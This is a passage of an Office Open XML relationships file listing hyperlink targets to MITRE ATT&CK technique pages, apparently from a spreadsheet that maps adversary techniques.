Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1102/001" TargetMode="External"/><Relationship Id="rId617" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1478" TargetMode="External"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1011/001" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591/003" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/005" TargetMode="External"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1563/002" TargetMode="External"/><Relationship Id="rId463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1129" TargetMode="External"/><Relationship Id="rId519" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1124" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543/004" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1587/002" TargetMode="External"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/002" TargetMode="External"/><Relationship Id="rId530" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/001" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098/004" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/013" TargetMode="External"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/004" TargetMode="External"/><Relationship Id="rId572" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1438" TargetMode="External"/><Relationship Id="rId628" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1399" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1210" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/007" TargetMode="External"/><Relationship Id="rId432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1207" TargetMode="External"/><Relationship Id="rId474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/011" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1486" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1557" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1185" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1189" TargetMode="External"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1601/002" TargetMode="External"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/008" TargetMode="External"/><Relationship Id="rId541" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1550/003" TargetMode="External"/><Relationship Id="rId583" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1540" TargetMode="External"/><Relationship Id="rId639" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1469" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1573/002" TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1606/002" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/009" TargetMode="External"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/003" TargetMode="External"/><Relationship Id="rId443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1113" TargetMode="External"/><Relationship Id="rId650" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1426" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1056" TargetMode="External"/><Relationship Id="rId485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/002" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1560/002" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1619" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1025" TargetMode="External"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1095" TargetMode="External"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1598" TargetMode="External"/><Relationship Id="rId510" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1016" TargetMode="External"/><Relationship Id="rId552" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1125" TargetMode="External"/><Relationship Id="rId594" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1446" TargetMode="External"/><Relationship Id="rId608" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1477" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/001" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/015" TargetMode="External"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590/001" TargetMode="External"/><Relationship Id="rId412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090/001" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1613" TargetMode="External"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/008" TargetMode="External"/><Relationship Id="rId454" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1593/001" TargetMode="External"/><Relationship Id="rId496" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/004" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1074/002" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/001" TargetMode="External"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/002" TargetMode="External"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055" TargetMode="External"/><Relationship Id="rId521" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1212" TargetMode="External"/><Relationship Id="rId563" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1102/003" TargetMode="External"/><Relationship Id="rId619" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1579" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1586" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1587/004" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1052/001" TargetMode="External"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/001" TargetMode="External"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1615" TargetMode="External"/><Relationship Id="rId465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/001" TargetMode="External"/><Relationship Id="rId630" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1507" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/001" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/015" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555/001" TargetMode="External"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/004" TargetMode="External"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/006" TargetMode="External"/><Relationship Id="rId532" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/003" TargetMode="External"/><Relationship Id="rId574" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1427" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1568/001" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1008" TargetMode="External"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/009" TargetMode="External"/><Relationship Id="rId434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053" TargetMode="External"/><Relationship Id="rId476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/013" TargetMode="External"/><Relationship Id="rId641" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1465" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T157/001" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1602" TargetMode="External"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/011" TargetMode="External"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1106" TargetMode="External"/><Relationship Id="rId501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/005" TargetMode="External"/><Relationship Id="rId543" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/001" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1565/001" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1499/001" TargetMode="External"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1120" TargetMode="External"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/005" TargetMode="External"/><Relationship Id="rId585" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1436" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/002" TargetMode="External"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1592/001" TargetMode="External"/><Relationship Id="rId445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1597/001" TargetMode="External"/><Relationship Id="rId487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/004" TargetMode="External"/><Relationship Id="rId610" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1541" TargetMode="External"/><Relationship Id="rId652" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1421" TargetMode="External"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/01" TargetMode="External"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1056/002" TargetMode="External"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027" TargetMode="External"/><Relationship Id="rId512" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1049" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1123" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/001" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1491" TargetMode="External"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1598/002" TargetMode="External"/><Relationship Id="rId554" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1497/001" TargetMode="External"/><Relationship Id="rId596" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1520" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/003" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1480/001" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590/003" TargetMode="External"/><Relationship Id="rId414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090/003" TargetMode="External"/><Relationship Id="rId456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1594" TargetMode="External"/><Relationship Id="rId498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/002" TargetMode="External"/><Relationship Id="rId621" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1461" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087/002" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1136/001" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564" TargetMode="External"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/003" TargetMode="External"/><Relationship Id="rId523" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1205/001" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/006" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1586/002" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555/003" TargetMode="External"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/004" TargetMode="External"/><Relationship Id="rId565" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1220" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1561" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1567/001" TargetMode="External"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/003" TargetMode="External"/><Relationship Id="rId467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/003" TargetMode="External"/><Relationship Id="rId632" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1410" TargetMode="External"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/001" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/003" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037/001" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1602/002" TargetMode="External"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1578/001" TargetMode="External"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/001" TargetMode="External"/><Relationship Id="rId534" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/005" TargetMode="External"/><Relationship Id="rId576" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1616" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1568/003" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1222" TargetMode="External"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1069/001" TargetMode="External"/><Relationship Id="rId436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/002" TargetMode="External"/><Relationship Id="rId601" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1523" TargetMode="External"/><Relationship Id="rId643" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1513" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1592/003" TargetMode="External"/><Relationship Id="rId478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1216" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071/001" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/003" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/001" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562" TargetMode="External"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1599/001" TargetMode="External"/><Relationship Id="rId503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1195" TargetMode="External"/><Relationship Id="rId545" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/002" TargetMode="External"/><Relationship Id="rId587" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1532" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/004" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1565/003" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1499/003" TargetMode="External"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542" TargetMode="External"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/009" TargetMode="External"/><Relationship Id="rId447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596" TargetMode="External"/><Relationship Id="rId612" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1581" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590/005" TargetMode="External"/><Relationship Id="rId489" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1528" TargetMode="External"/><Relationship Id="rId654" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1576" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1020" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1056/004" TargetMode="External"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/002" TargetMode="External"/><Relationship Id="rId514" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1007" TargetMode="External"/><Relationship Id="rId556" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1497/003" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/003" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1136/003" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1491/002" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/005" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048/001" TargetMode="External"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/006" TargetMode="External"/><Relationship Id="rId416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1012" TargetMode="External"/><Relationship Id="rId598" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1407" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190" TargetMode="External"/><Relationship Id="rId458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1505/001" 